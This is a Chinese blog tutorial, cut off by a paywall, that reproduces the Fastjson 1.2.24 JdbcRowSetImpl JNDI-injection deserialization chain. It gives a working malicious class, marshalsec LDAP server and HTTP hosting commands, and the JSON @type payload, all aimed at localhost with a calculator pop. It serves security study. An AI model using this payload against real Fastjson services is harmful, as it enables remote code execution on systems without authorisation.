Fastjson JdbcRowSetImpl利用链学习

最新推荐文章于 2024-03-03 15:14:04 发布
VIP文章 最新推荐文章于 2024-03-03 15:14:04 发布
阅读量1.4k 收藏 1
点赞数
分类专栏: python 文章标签: 计算机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013190417/article/details/124185734
版权

Python微信订餐小程序课程视频

https://blog.csdn.net/m0_56069948/article/details/122285951

Python实战量化交易理财系统

https://blog.csdn.net/m0_56069948/article/details/122285941

JdbcRowSetImpl

接着继续学习fastjson的第二条链JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,而且其原理就是setter的自动调用,具体setter调用代码可以参考上篇文章调试的部分

1、漏洞复现

1.1、组件依赖版本

fastjson:1.2.22-1.2.24

1.2、利用方式

不像TemplatesImpl链需要指定的利用方式,JdbcRowSetImpl链只需要可以控制输入就能利用。

JSON.parse(evil);
JSON.parseObject(evil);
JSON.parseObject(evil, Object.class);

当然对jdk的版本有需求,因为高版本jdk对jndi和rmi有限制,在rmi篇也有说明这里再次贴出,方便自己以后查看

RMI利用的JDK版本≤ JDK 6u132、7u122、8u113

LADP利用JDK版本≤ 6u211 、7u201、8u191

img

图为阿里云应用

1.3、漏洞复现

准备恶意的代码

import java.io.IOException;

public class EXP {
    public EXP() throws IOException {
        Runtime.getRuntime().exec("open /System/Applications/Calculator.app");
    }
}

编译恶意代码

javac EXP.java

开启http服务

python3 -m http.server

image-20220413214234339

用marshalsec开jndi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8000/#EXP 1389

image-20220413214333530

使用JdbcRowSetImpl构造poc,成功弹窗

package com.akkacloud.demo;

import com.sun.rowset.JdbcRowSetImpl;

import java.sql.SQLException;

public class fastjonTest2 {
    public static void main(String[] args) {

        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        try {
            jdbcRowSet.setDataSourceName("ldap://localhost:1389/#EXP");
            jdbcRowSet.setAutoCommit(true);
        } catch (SQLException throwables) {
            throwables.printStackTrace();
        }

    }
}

image-20220413214619189

因为fastjson会自动调用setter和getter,具体可以看

Poc调试的那部分,所以我们就可以构造处fastjson的poc

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://localhost:1389/#EXP", "autoCommit":true}

我们JSON.parse()试一下

poc

package com.akkacloud.demo;

import com.alibaba.fastjson.JSON;
import com.sun.rowset.JdbcRowSetImpl;

import java.sql.SQLException;

public class fastjonTest2 {
    public static void main(String[] args) {
        String exp = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:1389/#EXP\", \"autoCommit\":true}";
        JSON.parse(exp);
    }
}

image-20220413215221580

1.4、利用链调试

这次我们就直接跳过fastjson的利用链,因为在TemplateImpl中已经详细跟进过,我们直接进入到 jdbcRowImpl,在setDataSourceName方法打下断点,其实看调用栈也是可以看出&

最低0.47元/天 解锁文章
虚幻私塾
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
fastjson反序列化利用
09-29
“本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束”
fastjson反序列化漏洞_fastjson结合JdbcRowSetImpl反序列化利用理解
weixin_39783156的博客
11-28 436
前言最近看到网上有新出的fastjson反序列化利用,就好奇的琢磨了一下,查了一些资料然后整理出来,有不正确的地方还望指正。反序列化的利用本质:找到一条有效的攻击链,攻击链的末端就是有代码执行能力的类,来达到我们想做的事情,一般都是用来RCE(远程命令执行)。构造一个触发器,也就是通过什么方式来让攻击链执行你想要的代码。触发器可以通过很多方式,比如静态代码块、构造方法等等。fastjson是阿里巴...
FastJson<=1.2.24 JdbcRowSetImpl利用链分析
weixin_45682070的博客
12-29 3313
前言 上文分析了TemplatesImpl利用链,对fastjson parseObject函数进行了分析,明白了整个触发漏洞的流程,接着来学习JdbcRowSetImpl 利用链,JdbcRowSetImpl利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要Json.parse(input)即可进行命令执行。这条链主要利用了setAutoCommit方法调用InitialContext.lookup并且参数是未经过滤dataSourceName,导致JNDI注入,造成命令执行。其中涉及了JDNI
【Web】速谈FastJson反序列化中JdbcRowSetImpl利用
最新发布
uuzeray的博客
03-03 636
继续看connect方法,显然conn为空且我们有DataSourceName属性,进到else if的分支,调用(new InitialContext()).lookup(),经典何须多言,只要dataSourceName设为恶意远程RMI服务或LDAP服务打JNDI即可。fastjson的第二条链JdbcRowSetImpl,主要是利用jndi注入达到的攻击,而且没有什么利用限制,其原理就是setter的自动调用。开一个恶意LDAP服务器。找个端口放恶意字节码。
Java反序列化6-Fastjson JdbcRowSetImpl 链及后续漏洞分析
weixin_43263451的博客
07-18 1176
上一节讲了TemplatesImpl链的利用方式,但是呢其局限性较大需要后端开启Feature.SupportNonPublicField且因为Feature.SupportNonPublicField是在fastjson1.2.22版本才引入所以只影响1.2.22-1.2.24版本fastjson这里的JdbcRowSetImpl链比TemplatesImpl链利用范围更大一点后面版本的fastjson漏洞都是在绕过黑名单,所以在本文中一次全部陈述总结前言.前言.前言。............
fastjson1.2.24反序列化漏洞复现,验证JdbcRowSetImpl
liu649983697的专栏
05-30 1442
fastjson反序列化漏洞复现、实验、验证,远程命令调用、漏洞攻击
1.2.24 Fastjson反序列化TemplatesImpl和JdbcRowSetImpl利用链分析(非常详细)
dreamthe的博客
07-07 2057
本文的关于Fastjson1.2.24版本TemplatesImpl利用链的分析非常详细,如果你不是很熟悉该利用链,这篇文章非常适合你去学习,有比较详细的代码讲解。但是由于本人不是专业学习java的,只能以自己的理解去理解代码。应该不会差太多。有不懂可以评论区留言。...............
fastjson——分享
Matthew
08-06 1436
fastjson——分享 功能描述 fastjson的功能就是将json格式转换为类、字符串等供下一步代码的调用,或者将类、字符串等数据转换成json数据进行传输,有点类似序列化的操作; FastJson利用 toJSONString 方法来序列化对象,而反序列化还原回 Object 的方法,主要的API有两个,分别是 JSON.parseObject 和 JSON.parse ,最主要的区别就是前者返回的是 JSONObject 而后者返回的是实际类型的对象,当在没有对应类的定义的情况下,通常情况下都会使
JAVA详细思路|Java安全之FastJson JdbcRowSetImpl 链分析
m0_57227221的博客
05-17 1038
Java安全之FastJson JdbcRowSetImpl 链分析 0x00 前言 这一次我们来学习 JdbcRowSetImpl 利用链, JdbcRowSetImpl利用链在实际运用中较为广泛,这个链基本没啥限制条件,只需要 Json.parse(input) 即可进行命令执行。 0x01 漏洞分析 利用限制 首先来说说限制,基于JNDI+RMI或JDNI+LADP进行攻击,会有一定的JDK版本限制。 RMI利用的JDK版本≤ JDK 6u132、7u122、8u113 LADP利用JDK版本≤
Fastjson 的 3 种漏洞利用链,一起来看看
Java技术栈,分享最主流的Java技术
11-05 1508
作者:4ra1n 来源:https://www.anquanke.com/post/id/248892 Fastjson已被大家分析过很多次,本文主要是对三种利用链做分析和对比 JdbcRowSetImpl String payload = "{\n" + " \"a\":{\n" + " \"@type\":\"java.lang.Class\",\n&quot
Fastjson 1.2.24远程代码执行漏洞(com.sun.rowset.JdbcRowSetImpl
further_eye的博客
11-16 3861
漏洞是利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大的影响。
fastjson-c3p0:fastjson不出网回显利用
03-19
fastjson不出网回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0....
FastJson.java
09-04
com.alibaba.fastjson.JSON读写json
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
最新版fastjson-2.0.4.jar
06-22
最新版fastjson-2.0.4.jar,阿里巴巴旗下现最流行的json转换工具包。详细操作使用,请参考我的文章链接:https://blog.csdn.net/qq_45978154/article/details/125004445?spm=1001.2014.3001.5502
fastjson反序列化JdbcRowSetImpl
qq_40710190的博客
07-08 258
fastjson利用
『Java安全』基础JNDI注入原理和手段探究(低版本)
Ho1aAs‘s Blog
01-17 3954
文章目录客户端加载恶意RMI Remote类原理实现限制参考完 客户端加载恶意RMI Remote类 原理 codebase是一个URL、引导JVM查找类的地址 Client在lookup加载过程中会先在本地寻找Stub类,如果没有找到就向codebase远程加载Stub类。 若设置codebase为http://foo.com,加载com.test.Test类时便会下载http://foo.com/com/test/Test.class 那么只要控制Server端的codebase(修改Client端的c
『Java安全』反序列化-FastJson 1.2.24反序列化漏洞POP链分析_TemplatesImpl和JdbcRowSetImpl JNDI注入分析_marshalsec测试payload利用
Ho1aAs‘s Blog
03-06 1102
文章目录前言版本FastJson基础一、反序列化TemplatesImpl类payload代码审计 | 原理分析JSON.parse()处理byte[]JSON.parse()触发TemplatesImpl.getOutputProperties()代码复现参考完 前言 版本 FastJson <= 1.2.24 FastJson基础 『Java』Fastjson基础 一、反序列化TemplatesImpl类 payload { "@type":"com.sun.org.apache.xalan
14-java安全——fastjson1.2.24反序列化JdbcRowSetImpl利用链分析
网络安全
09-01 732
fastjson在1.2.24版本中,除了TemplatesImpl链之外,还有一个JdbcRowSetImpl利用链,JdbcRowSetImpl链有两种利用方式:一种是RMI和JNDI利用方式,另一种是JNDI和LDAP利用方式,关于JNDI的相关概念之前在java安全基础中已经介绍过了,而且底层原理已经分析过了,大家可自行参考以下文章。 4-java安全基础——RMI远程调用 5-java安全基础——RMI和JNDI实现漏洞利用 6-java安全基础——JNDI和LDAP利用 1. RMI
fastjson漏洞利用
09-07
对于Fastjson漏洞利用,可以通过利用Fastjson的反序列化漏洞来实施攻击。这些漏洞可能导致远程代码执行或者JNDI注入的风险。具体来说,攻击者可以构造一个恶意的JSON字符串,其中包含一个特殊的类或对象,以触发Fastjson在反序列化时执行恶意的代码。这样的攻击可以导致服务器受到攻击者完全控制的风险。 为了防止Fastjson漏洞的利用,可以采取以下措施: 1. 及时更新Fastjson库至最新版本,因为Fastjson团队通常会修复已知的安全漏洞。 2. 配置Fastjson的autotype机制,限制只反序列化预定义的安全类。这样可以减少恶意类的反序列化风险。 3. 限制Fastjson的使用范围,仅在可信赖的环境中使用。不要从不受信任的来源接收、解析和反序列化JSON数据。 4. 使用安全的编码和输入验证,确保JSON数据的完整性和真实性。 需要注意的是,漏洞利用是一种恶意行为,违法的使用是不被允许的。这里提供的信息仅供技术参考和学习目的。使用Fastjson的开发人员应该保持警惕,及时更新并采取适当的安全措施来保护系统的安全。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值